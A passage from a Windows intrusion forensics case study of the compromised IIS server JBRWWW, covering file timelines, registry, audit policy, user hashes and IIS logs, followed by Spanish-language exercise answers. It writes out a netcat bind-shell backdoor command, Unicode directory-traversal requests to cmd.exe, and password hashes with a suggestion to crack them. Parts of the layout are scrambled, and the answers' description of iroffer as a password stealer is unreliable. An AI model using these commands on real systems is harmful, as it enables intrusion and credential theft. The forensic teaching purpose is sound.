10\01\2003 19:16:30 61440 c:\WINNT\system32\PSEXESVC.EXE 10\01\2003 19:24:37 120320 c:\WINNT\system32\os2\dll\nc.exe 10\01\2003 19:25:07 13929 c:\WINNT\system32\os2\dll\Configure 10\01\2003 19:25:07 15427 c:\WINNT\system32\os2\dll\COPYING 10\01\2003 19:25:07 68016 c:\WINNT\system32\os2\dll\cygregex.dll 10\01\2003 19:25:07 971080 c:\WINNT\system32\os2\dll\cygwin1.dll 10\01\2003 19:25:08 902 c:\WINNT\system32\os2\dll\iroffer.cron 10\01\2003 19:25:08 213300 c:\WINNT\system32\os2\dll\iroffer.exe 10\01\2003 19:25:09 2924 c:\WINNT\system32\os2\dll\Makefile.config

10\01\2003 19:25:09 0 c:\WINNT\system32\os2\dll\mybot.ignl 10\01\2003 19:25:09 0 c:\WINNT\system32\os2\dll\mybot.ignl.bkup 10\01\2003 19:25:09 4 c:\WINNT\system32\os2\dll\mybot.ignl.tmp 10\01\2003 19:25:09 25774 c:\WINNT\system32\os2\dll\mybot.log 10\01\2003 19:25:09 168 c:\WINNT\system32\os2\dll\mybot.msg 10\01\2003 19:25:09 5 c:\WINNT\system32\os2\dll\mybot.pid 10\01\2003 19:25:09 19792 c:\WINNT\system32\os2\dll\myconfig 10\01\2003 19:25:09 5080 c:\WINNT\system32\os2\dll\README 10\01\2003 19:25:09 19767 c:\WINNT\system32\os2\dll\sample.config 10\01\2003 19:25:10 16735 c:\WINNT\system32\os2\dll\WHATSNEW 10\01\2003

19:48:44 0 c:\update.exe 10\01\2003 19:52:44 122880 c:\WINNT\system32\os2\dll\update.exe 10\01\2003 19:55:42 32768 c:\WINNT\system32\os2\dll\setup.exe 10\01\2003 19:55:51 36864 c:\WINNT\system32\os2\dll\samdump.dll 10\01\2003 19:58:38 342 c:\WINNT\system32\os2\dll\temp.txt 10\01\2003 21:56:22 49 c:\WINNT\system32\os2\dll\mybot.xdcc.bkup 10\01\2003 c:\Documents and Data\Microsoft\Internet 10\01\2003 22:26:23 49 c:\WINNT\system32\os2\dll\mybot.xdcc 10\01\2003 22:26:23 233 c:\WINNT\system32\os2\dll\mybot.xdcc.txt 22:22:59 16384 Settings\Administrator\Application Explorer\MSIMGSIZ.DAT

We obviously know that iroffer was installed on the system from earlier steps in our investigation. We also saw that the attacker, along with PsExec, established a backdoor with netcat. The files we did not know about are bolded in

Table 1-2. All of the files in Table 1-2 are of interest to us, and it would behoove us to copy these files to our forensic workstation to perform additional tool analysis. We will describe the process for acquisition a little later in this chapter so that we may perform tool analysis later. We could obviously perform a sort on modified and access times and review the files that may have been altered or run around the time of the suspicious files listed in Table 1-2. We will save you that step, however, because there are no interesting results from that investigative action. Registry Data There are two main investigative leads we can discover in the registry dump. Although the result of dumping the registry is large (in the case of JBRWWW, it was more than 7 MB long), we can quickly search for the following leads: Programs Entries executed created by the on bootup intruders tools

We are able to capture the complete registry, in a rather cryptic format, by using RegDmp without command-line options. The output is ASCII-formatted such that Microsofts registry tools can alter the contents. Because we are interested in only a few lines, we will do our analysis with a standard text editor. After we obtain the output with the regdmp command, we see that the key \HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion contains three sub-keys that are of interest to us: Run, RunOnce, and RunOnceEx. Any values in the Run keys signify programs that will be executed when the system starts up. JBRWWW had the following information in this area of the registry: Run Synchronization Manager = mobsync.exe /logon RunOnce RunOnceEx mobsync.exe is a system binary, so we do not see tools the intruder intended to execute at system startup. If the attacker was savvy, he could have placed the following command in the registry to automatically open a backdoor: nc d L p 10000 e C:\winnt\system32\cmd.exe Another thing we may want to look for in the registry is any suspicious artifact from the intruders tool. This may sound daunting, but it really isnt. Most of the time we know the names of the tools because of the entries in the

file system. Therefore, in the case of JBRWWW, we may search for "PsExec", "iroffer", or other relevant file names. Searching for these names yielded nothing for JBRWWW. This step becomes more important when you have a rack of servers and you know one is compromised. After you do a thorough investigation and find the remnants in the registry from an intruders tools, you can quickly do a search on other servers to determine whether they were compromised also. The Auditing Policy The next series of tools we will be running will depend on JBRWWW's auditing policy. Without proper auditing (and that is the default for Windows NT and 2000, by the way), we will not have security-related logs. The command to determine the auditing policy is auditpol. Auditpol is distributed with Microsoft's resource kits. The following information is returned when we run auditpol without command-line arguments on JBRWWW: Running ... (0) Audit Disabled System = No Logon = No Object Access = No Privilege Use = No Process Tracking = No Policy Change = No Account Management = No Directory Service Access = No Account Logon = No This is disturbing! There are no events generated from logins or other security-related events. Our system event logs will not be a good source of information for us because of the conservative auditing policy. Believe it or not, we see this during a majority of our investigations. A History of Logins A history of logins can be obtained with the NTLast command, distributed by http://www.foundstone.com. NTLast can be run in a myriad of ways, but we are interested in all of the logins, so we will not use command-line arguments when we run it on JBRWWW: - No Records - Check to see if auditing is on Yikes! This tool depends on the auditing policy to determine the login history. As you can see, it is very important to enable auditing.

System Event Logs Typically, there are three types of event logs on a Windows machine: Security Application System The command PsLogList within the PsTools suite distributed at http://www.sysinternals.com will extract these logs into a nice, easy-to-read text format. The following command will dump the Security Event Logs a comma-delimited format suitable for your favorite spreadsheet program: psloglist s x security The -s switch tells psloglist to dump each event on a single line so that the output is suitable for analysis with a spreadsheet. The -x switch tells psloglist to dump the extended information for each event. You can also replace security with application or system if you want to acquire the other logs on the victim system. The Security Event Log contains all of the information generated by our auditing policy, discussed in a previous section. Most importantly, we would be interested in the information regarding logons/logoffs and any objects audited on the system. Of course, as we would expect, JBRWWW reports no events in the logs. The application event log contains data generated from the installed applications. Some events are informational, whereas others indicate application failures. As we peruse JBRWWWs application logs, all we see are messages created from the installation of standard programs on the system beginning August 23, 2003. The system event log, as you may have guessed, contains the messages from system services. The system log is the log where you would see device driver failures, IP address conflicts, and other information. As we browse JBRWWWs system logs, we see only messages created from standard use of the system. It seems that the event logs, in this investigation, do not give us valid leads. User Accounts The easiest type of backdoor for an intruder to use is that will blend into the normal traffic patterns for victim machine. Therefore, it would make sense for attacker to create a new user so that he could log into one the the the

same services that valid users utilize. It is simple for us to dump the user accounts using the popular pwdump utility, which is well known by administrators and attackers alike. By typing pwdump on JBRWWW, we receive the following information: Administrator:500:9DCFD05D3688BBBFAAD3B435B51404EE:CB8C5705 F92DE9D8D11642948ECCAB72::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: IUSR_JBRWWW:1000:B936986BA1C5636B0F28D0549F4A7C10:137C045C1 CACAE4B07C6C3B88BF0CE6D::: IWAM_JBRWWW:1001:DA3DF28964893179378B2EB9047FBA87:A2C8D0EC2 09C60A48DB9365A51565DC4::: There are four users for JBRWWW: Administrator, Guest, IUSR_JBRWWW, and IWAM_JBRWWW. Administrator is the super user account (RID 500) that every system must have. Guest is a disabled account that also exists on all Windows systems. IUSER_JBRWWW and IWAM_JBRWWW are normal user accounts that processes, such as the IIS Web server, use to run. These accounts are on the machine to limit the damage an attacker could cause the system through a Web-based attack because he would only have a lowly user account rather than Administrator-level access right away. We see that there are no other accounts on JBRWWW of interest. IIS Logs Most attacks in the modern era happen over TCP port 80 (HTTP). Why? you may ask. Because there are literally millions of Web servers running, and incoming port 80 traffic is rarely blocked at the victims network boundaries. You cannot block what you must allow in. Because we have not seen the initial method of intrusion, we can only guess at this point that it may have been the IIS Web server. The IIS Web server writes any activity to logs in the C:\winnt\system32\logfiles directory by default. In this directory, there is another directory named W3SVCn, where n is the unique ID of the Web server. Usually this ID starts at one, but because one Web server can host numerous domains, each W3SVC directory must be analyzed. JBRWWW only hosted one domain, so the directory of interest is W3SVC1. Inside the W3SVC1 directory there are two files: ex030923.log and ex031001.log. Each of these logs contains the activity for the Web server for a whole day. The file name distinguishes the day: ffyymmdd.log . . . where ff is the format, yy is the year, mm is the

month, and dd is the day. IIS can log three different types of formats: W3C Extended (ff would be ex in this case), NCSA common (ff would be nc in this case), and Microsoft IIS native format (ff would be in in this case). JBRWWW is using the default extended log formatting and contains activity for the days of September 9, 2003 and October 1, 2003. The next problem we must overcome is how to transfer the relevant logs to our forensic workstation. We do not want to FTP them or to perform any other intrusive command that would greatly change the state of JBRWWW because we will be performing a forensic duplication in the future. Instead, if you refer to the introduction in this chapter, we presented a method of transferring data from one machine to another. Instead of using command like we initially presented, we will use type file.txt to transfer file.txt from the victim machine to the forensic workstation. Therefore, first execute this command on the forensic workstation: nc v l p 2222 > ex030923.log Next, type the following command on JBRWWW to transfer the file named ex030923.log to our forensic workstation: type c:\winnt\system32\logfiles\w3svc1\ex030923.log | nc __forensic_workstation_ip_address 2222 Press CTRL-C when the file is finished transferring. This can be confirmed with a simple network monitoring session (described in a later chapter). We also performed the same series of commands to transfer ex031001.log to the forensic workstation. When we open ex030923.log, we see the following header: #Software: Microsoft Internet Information Services 5.0 #Version: 1.0 #Date: 2003-09-23 22:50:59 #Fields: time c-ip cs-method cs-uri-stem sc-status The date and time, the first bolded line, are actually reported in GMT, not EDT (JBRWWWs local time zone). Keep this in mind because it can trip you up when correlating this information to other auditing material (such as file system time and date stamps). The second bolded line lists the recorded fields. These are the default fields that are recorded by the IIS server, but there are many more available if the Administrator enables them. A good reference for these fields exists at http://www.microsoft.com/technet/prodtechnol/windowsserver2 003/proddocs/standard/ref_we_logging.asp

As we begin to skim the first few lines, we notice something very interesting. First, the accesses happen very quickly, and the source IP address is 95.16.3.79. The speed of the Web accesses is much faster than one person can type. Second, the fourth request has an interesting keyword embedded in it: 22:51:17 95.16.3.79 GET /Nikto-1.30-Y7hUN21Duija.htm 404 Nikto is a well-known Web server vulnerability scanning tool available from http://www.cirt.net/code/nikto.shtml. It would make sense that a Web vulnerability scanning tool would access JBRWWW repeatedly in a short amount of time. Another telltale sign is the status code (the last number 404). Any time this number is in the 400s, the access was unsuccessful. If the status code was in the 200s, the access was successful. Web vulnerability scanners generate numerous result codes in the 400s. Other result codes can be compared to the chart at http://www.iisfaq.com/default.aspx?View=A145&P=230. Upon reviewing the log for September 9, we see that all the activity came from one IP address in less than one minute. JBRWWW was the victim of an HTTP vulnerability scan on that day. On October 1, 2003, we see the following activity:

#Software: Microsoft Internet Information Services 5.0 #Version: 1.0 #Date: 2003-10-01 22:58:53 #Fields: time c-ip cs-method cs-uri-stem sc-status 22:58:53 95.208.123.64 GET /NULL.printer 404 23:00:55 95.208.123.64 HEAD /iisstart.asp 200 23:01:18 95.16.3.79 GET /iisstart.asp 200 23:01:18 95.16.3.79 GET /pagerror.gif 200 23:01:18 95.16.3.79 GET /favicon.ico 404 23:03:23 95.208.123.64 GET /NULL.printer 404 23:08:45 95.16.3.79 GET /NULL.printer 404 23:15:09 95.208.123.64 OPTIONS / 200 23:16:30 95.208.123.64 OPTIONS / 200 23:16:30 95.208.123.64 PROPFIND /ADMIN$ 404 23:17:04 95.16.3.79 GET /scripts/../../../../winnt/system32/cmd.exe 200 23:17:54 95.16.3.79 GET /scripts/../../../../winnt/system32/cmd.exe 502 23:20:19 95.16.3.79 GET /scripts/..%5c..%5c.. %5c../winnt/system32/cmd.exe 200 23:32:43 95.208.123.64 OPTIONS / 200 23:32:43 95.208.123.64 PROPFIND /ADMIN$ 404 23:33:52 95.208.123.64 PROPFIND /ADMIN$ 404 23:58:16 95.208.123.64 OPTIONS / 200 23:58:16 95.208.123.64 PROPFIND /ADMIN$ 404

The first bolded line is a telltale sign of the ".printer" Microsoft Windows 2000 buffer overflow (Securityfocus.com Bugtraq ID 2674) from IP address 95.208.123.64. Because we are seeing the attack in our logs, we know it was unsuccessful. Typically, when this buffer overflow is used against a vulnerable server, it causes the Web server to crash, so the activity is not logged in the IIS log. The next four lines not bolded are attributed to users at 95.208.123.64 and 95.16.3.79 accessing the default Web page, perhaps checking whether the Web server is available. The second set of bolded lines represents unsuccessful attempts from 95.208.123.64 and 95.16.3.79 using the same ".printer" buffer overflow. Seeing two IP addresses tells us that they may be the same person or more than one person working together. The third set of bolded lines shows a successful (due to the result codes being 200 and 502) attack. If we dissect the attack, we see that someone accessed the C:\winnt\ system32\cmd.exe executable. The Web server should never access the cmd.exe command shell. In short, 95.208.123.64 was able to run commands on JBRWWW in the context of IUSR_JBRWWW (not Administrator). The first two bolded lines of this set show what is known as the Unicode attack. The last line shows the Double Decode attack (also referenced earlier in this chapter). Both attacks are a directory traversal attack in which the attacker escapes the directory to which the Web server is restricted to run arbitrary programs on the victim machine. To quickly locate similar attacks on other machines, we could easily search for cmd.exe in the IIS logs and see whether the result code was 200. Because JBRWWW did not enable more fields in the W3C extended logs, we cannot see what the attacker ran with the command shell. Suspicious Files If we were not acquiring a forensic duplication of JBRWWW, we could transfer any suspicious file with our "Poor Mans FTP" using netcat. The syntax for the command to run on the forensic workstation is as follows: nc v l p 2222 > filename Now, type the following command on JBRWWW to transfer the file named filename to our forensic workstation. Remember that the file named filename does not have to contain ASCII text. You can also transfer binary files on the victim machine in this manner. type filename | nc forensic_workstation_ip_address 2222 The binaries that were flagged by our file system analysis because they were created during the intrusion include the

following,

in

Table

1-3:

Table 1-3 The Suspicious Binaries Transferred from JBRWWW File Name c:\WINNT\system32\PSEXESVC.EXE c:\WINNT\system32\os2\dll\nc.exe c:\WINNT\system32\os2\dll\Configure c:\WINNT\system32\os2\dll\COPYING c:\WINNT\system32\os2\dll\cygregex.dll c:\WINNT\system32\os2\dll\cygwin1.dll c:\WINNT\system32\os2\dll\iroffer.cron c:\WINNT\system32\os2\dll\iroffer.exe c:\WINNT\system32\os2\dll\Makefile.config c:\WINNT\system32\os2\dll\mybot.ignl c:\WINNT\system32\os2\dll\mybot.ignl.bkup c:\WINNT\system32\os2\dll\mybot.ignl.tmp c:\WINNT\system32\os2\dll\mybot.log c:\WINNT\system32\os2\dll\mybot.msg c:\WINNT\system32\os2\dll\mybot.pid c:\WINNT\system32\os2\dll\myconfig c:\WINNT\system32\os2\dll\README c:\WINNT\system32\os2\dll\sample.config c:\WINNT\system32\os2\dll\WHATSNEW c:\update.exe c:\WINNT\system32\os2\dll\update.exe c:\WINNT\system32\os2\dll\setup.exe c:\WINNT\system32\os2\dll\samdump.dll

c:\WINNT\system32\os2\dll\temp.txt c:\WINNT\system32\os2\dll\mybot.xdcc.bkup c:\WINNT\system32\os2\dll\mybot.xdcc c:\WINNT\system32\os2\dll\mybot.xdcc.txt

We transferred these files to our forensic workstation and they are included on your DVD for further analysis. Putting It All Together The initial objective was to determine whether or not an incident occurred. The volatile and nonvolatile data collected during the Windows live response indicates that an unauthorized intrusion did in fact occur. Figure 1-1 indicates the status of ongoing unauthorized network connections detected during the response. Figure 1-1 Network Connections During Intrusion Response at 9:58PM on 1 October 2003 Although there were no Windows Security Event Logs, the IIS logs indicated that JBRWWW was scanned with a well-known Web scanning utility known as Nikto at 6:51:17PM on September 23, 2003, from IP address 95.16.3.79. Approximately 18 seconds prior to the scan, a default IIS Web page was accessed from the IP address 95.16.3.23. It is common before and after an attack for the intruder to check the status of the Web site by accessing such a page. This may indicate that the attacker had access or control of the system at 95.16.3.73 or perhaps was working with someone else who did. Then on October 1, 2003, an attacker from IP address 95.208.123.64, possibly working in conjunction with 95.16.3.79, initiated a successful Unicode attack after failed ".printer" buffer overflow attempts. Although the details havent been determined, it appears that the attackers were able to execute commands on JBRWWW via the IIS Unicode attack and establish an FTP session back to one of their systems. They were also able to install netcat and iroffer in the C:\WINNT\system32\os2\dll directory. Figure 1-2 shows a general sequence of the activity based on information collected during the response. Figure 1-2 Timeline for October 1, 2003

Up to this point, weve conducted the initial system approach, identified an intrusion, and obtained a forensic image of the victim system. In Chapters 3, "Collecting Network-Based Evidence," and 4, "Analyzing Network-Based Evidence for a Windows Intrusion," we will analyze network traffic captured as part of this intrusion, and in Chapter 8, "Noncommercial-Based Forensic Duplications," we will perform a forensic analysis of the system. Combining these processes will help "fill in the gaps" and will play a critical role in subsequent incident response cycles such as containment and eradication.

Existe evidencia del uso de una herramienta denominada IR0ffer en el servidor? Indique claramente con datos e informacin su respuesta y detalle.
El iroffer.exe, es un proceso de puerta trasera el cual puede ser instalado para fines malintensionados por un atacante permitiendo el acceso a un computador de manera remota, robando palabras de paso, actividades bancarias del Internet y datos personales, dentro de sus caractersticas principales se pueden encontrar:

http://www.infoprocesos.com/proceso/iroffer.exe.html Mediante el analisi de la informacin voltil es posible determinar que si hubo uso de la herramienta iroffer.exe, para lo cual fueron utilizados los siguientes comandos: Fport, el cual muestra los programas que estn activos y el puerto que utiliza para su ejecucin, se visualizan los siguientes resultados:
1224 iroffer 1224 iroffer * * 1224 iroffer -> 1174 TCP -> 1465 TCP -> 4153 TCP C:\WINNT\system32\os2\dll\iroffer.exe C:\WINNT\system32\os2\dll\iroffer.exe C:\WINNT\system32\os2\dll\iroffer.exe

Detalle de la evidencia FPORT APLICACIN Iroffer.exe RUTA

C:\WINNT\system32\os2\dll\iroffer.exe

PUERTO 1174/1465/4153

Pslist Es un comando de la suite Pstools que muestra la informacin acerca de procesos y subprocesos que se encuentran en ejecucin en un computador. En el anlisis de la informacin voltil, se encontraron las siguientes lneas que tienen relacin con iroffer.exe como resultado de su ejecucin:
Informacin de procesos para JBRWWW:
Name iroffer Pid Pri Thd 1224 8 5 Hnd 95 Mem 2564 User Time 0:00:00.090 Kernel Time 0:00:00.200 Elapsed Time 2:21:30.544

Detalle de la evidencia PSLIST NOMBRE Iroffer.exe File Times

permissions;access date;access time;modification date;modification time;change date;change time;user ownership;group ownership;file size;file name 666;10/01/03;;07/06/03;;10/01/03;;0;0;902;c:\WINNT\system32\os2\dll\iroffer.cron

PRIORIDAD
1224

MEMORIA 2564

El atacante tuvo acceso a la interfase de comandos (tuvo shell)? Puede ud detallar cmo lo hizo?
Inicalemnte el atacante mediante el comando Nestat rn, realizo el listado de los puertos TCP o UDP con su respectivo estado del servidor JBRWWW, y teneindo en cuenta que la ejecucin del fport lista los programas activos, donde nos indica la ejecucin de un nc.exe, que tiene la propiedad de abrir un shel. Algunos desarrolladores de software lo incluyen como puerta trasera con fines de accesos remotos para solucin de problemas, asi mismo se detecta que el atacante desde una unidad D, diferente a la raz del servidor JBRWWW ejecuta este comando, renombrado bajo el nombre de T_NC.EXE:
Pid Process Port Proto Path 1424 nc -> 60906 TCP C:\WINNT\system32\os2\dll\nc.exe

1348

t_NC

->

4151

TCP

D:\win_2k\intel\bin\t_NC.EXE

Puede conocer cual es la contrasea del administrador?

A travs del comando pwdump3 es posible visualizar los tipos de usuario que existen en JBRWWW, as como los hashes correspondientes a las contraseas de usuario utilizadas.
Administrator:500:9DCFD05D3688BBBFAAD3B435B51404EE:CB8C5705F92DE9D8D11642948ECCAB72::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: IUSR_JBRWWW:1000:B936986BA1C5636B0F28D0549F4A7C10:137C045C1CACAE4B07C6C3B88BF0CE6D::: IWAM_JBRWWW:1001:DA3DF28964893179378B2EB9047FBA87:A2C8D0EC209C60A48DB9365A51565DC4:::

Con estos resultados cuatro niveles de

es posible determinar que existen usuario: Administrador, Usuario,

IUSER_JBRWWW y IWAM_JBRWWW.

A partir del hash obtenido para la cuenta de usuario Administrador, es posible utilizar un programa de fuerza bruta para descifrar contraseas, tal como John the Ripper, con el cual se obtiene el siguiente resultado:

Lo cual es posible deducir que la contrasea Administrador puede tener los valores JBRWRT JBRWWD.

del

Puede asegurar que el archivo update.exe se instal en la mquina de manera remota? Como ya se vi en este anlisis, se llega a una hiptesis de que iroffer ha sido instalado en JBRWWW. Adems el atacante logr mediante el uso de netcat abrir un shell como puerta trasera, lo cual conlleva a ste a realiza runa serie de actividades, tales como la instalacin del programa update.exe en la unidad raz.